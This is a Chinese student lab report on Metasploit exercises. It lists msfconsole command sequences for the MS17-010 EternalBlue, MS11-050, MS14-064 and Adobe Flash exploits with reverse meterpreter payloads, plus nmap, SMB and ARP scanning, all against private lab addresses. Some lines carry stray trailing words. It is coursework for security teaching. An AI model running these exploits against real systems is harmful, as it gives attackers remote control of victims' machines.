2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用

实践使用漏洞和辅助模块

##任务一:MS17-010安全漏洞 ##任务二:(1)MS11-050(失败)(2)MS14-064(惟一) ##任务三:abode_flash_avm2 ##辅助模块:(1)ARP扫描模块(惟一)(2)auxiliary/scanner/smb/smb_ms17_010 (扫描靶机是否会被此漏洞攻击)(3)nmap扫描靶机开放端口(惟一)html

实践要求与问题回答

#1. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) 1.4 成功应用任何一个辅助模块。(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分shell

#问题回答 ####用本身的话解释什么是 exploit , payload , encode. exploit: 设至关于利用漏洞打开的通道,将作好的木马病毒等顺利传输到靶机。 payload: 简单来讲就是病毒代码包装成一个可执行的文件(任意指定类型),而后经过通道传输为获取靶机权限作准备。 encode: 针对payload进行编码,改变payload代码特征(例如不出现“0x00”的特殊机器码等),可是不改变payload为咱们所用的特征,能对payload进行加工。windows

实践过程

##<span style="color :red">本次实践所用的辅助功能及漏洞:nmap扫描,auxiliary辅助模块,MS17-010安全漏洞,MS11-050/MS14-064,abode_flash_avm2</span>浏览器

#1、Windows服务渗透攻击——MS17-010安全漏洞 ####(1)打开MSF输入nmap -O -Pn 192.168.239.129 ####(2)利用auxiliary辅助模块进行扫描:安全

msf > use auxiliary/scanner/smb/smb_ms17_010       
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129    
msf auxiliary(scanner/smb/smb_ms17_010) > run

####(3)根据要求设置并攻击: 输入back退回,而后依次输入:网络

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp 
set LHOST 192.168.239.131
set RHOST 192.168.239.129
exploit

#2、浏览器渗透攻击——MS11-050/MS14-064 ####(1) 打开MSF,依次输入:session

use windows/browser/ms11_050_mshtml_cobjectelement
set payloadwindows/meterpreter/reverse_http
set LHOST 192.168.239.131
set LPORT 5313
exploit

在靶机上打开生成的URL,发现报错,猜想多是漏洞和IE版本问题 tcp

####(2)从新选择: 主要步骤和(1)中大体相同,就是修改一下调用的名称。注意:<span style="color :yellow">须要添加的指令AllowPowershellprompt---true并将http连接改为tcp连接</span> 编码

生成URL并开启监听服务: spa

靶机打开IE浏览器,输入网址:

攻击机回连成功,输入sessions -i获取对话:

#3、针对Adobe Reader软件的渗透攻击——abode_flash_avm2 ####(1)生成PDF文件没有成功(上一届学长学姐的经验并很差用) ####(2)利用abode_flash_avm2攻击:

(1)输入search abode

(2)根据要求进行配置:

use exploit/windows/browser/abode_flash_avm2
set srvhost 192.168.239.131
set lhost 192.168.239.131
set payloadwindows/meterpreter/reverse_tcp

(3)在靶机里下载adobe_flash_11。

(4)输入exploit:

(5)在靶机里登陆生成出来的地址:

(6)获取权限:

#4、辅助模块——ARP扫描模块 ####网络安全协议中曾经讲到过ARP欺骗,因而我便尝试了ARP扫描 (1)seach寻找模块:

(2)根据要求配置: 第一次扫描的是一个网段(设置及结果以下):

第二次扫描靶机:

实践总结及体会

本次试验在我看来为漏洞寻找合适的靶机是一件很费时间的事情,须要足够的耐心,第二就是如何正确利用MSF的辅助功能为攻击作好铺垫,仍然须要大量反复的实践,否则所掌握的东西仅仅知识一点点皮毛而已。同时我发现想要利用一个漏洞进行攻击也不是一件容易的事情,由于一个漏洞不可能对全部状况都适用,因此攻击方不只仅是要找合适的漏洞,也要为漏洞找合适的机器或程序。矛和盾的较量看来还要持续好久好久。

相关文章
相关标签/搜索